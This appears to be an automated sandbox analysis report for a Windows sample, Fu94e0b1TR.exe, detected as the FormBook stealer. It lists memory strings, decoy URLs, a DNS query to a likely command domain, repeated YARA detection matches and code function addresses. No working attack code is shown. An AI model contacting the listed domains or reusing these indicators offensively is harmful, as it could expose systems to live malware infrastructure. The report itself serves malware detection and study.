Source: Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlr
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Fu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlx
Source: Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers5
Source: Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersK
Source: Fu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersP
Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersiva
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com7
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comD
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comF
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comFk
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comI.TTF
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comR.TTF
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comalicu
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comd
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comdito
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comessed
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comk
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comt
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comtuta
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/k
Source: Fu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/denQ
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Fu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNormaldk
Source: Fu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmS
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/)
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp//lpk
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/7
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/D
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ro
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ch
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/D
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/k
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ms
Source: Fu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/nly
Source: Fu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/nt
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/v
Source: Fu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.coma-e
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.de
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deMT
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmp, String found in binary or memory: https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34I
Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmp, String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_land
(The two HTTPS URLs in NETSTAT.EXE memory are response content from the decoy check-ins: a Sedo parking page for shacksolid.com, a decoy domain from the configuration, and a flow.page URL that still carries the /ef6c/ query, presumably a redirect from one of the decoy domains. Neither is additional C2.)
Source: unknown, DNS traffic detected: queries for: www.apricitee.com

            E-Banking Fraud:

Yara detected FormBook: the same 13 matches (4 unpacked PEs, 9 memory dumps) as listed under AV Detection.

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Fu94e0b1TR.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_00F5D064
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_00F5F296
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_00F5F298
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00401030
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041B9DA
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041C2B0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00408C70
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041BC20
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00402D87
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041C58D
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00402D90
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041BE92
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00402FB0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0118F900
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01180D20
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A4120
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01251D55
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B2581
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119D5E0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119841F
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01241002
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0119B090
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011B20A0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011BEBB0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011A6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D66E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01002
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E11D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D40D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DB9DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DC2B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DBC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003C8C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003C2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DC58D
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003C2D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DBE92
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003C2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 02D4B150 appears 32 times
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: String function: 0118B150 appears 35 times
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004185B0 NtCreateFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00418660 NtReadFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004186E0 NtClose
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00418790 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004185AA NtCreateFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004186DA NtClose
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041878A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9910 NtAdjustPrivilegesToken,LdrInitializeThunk
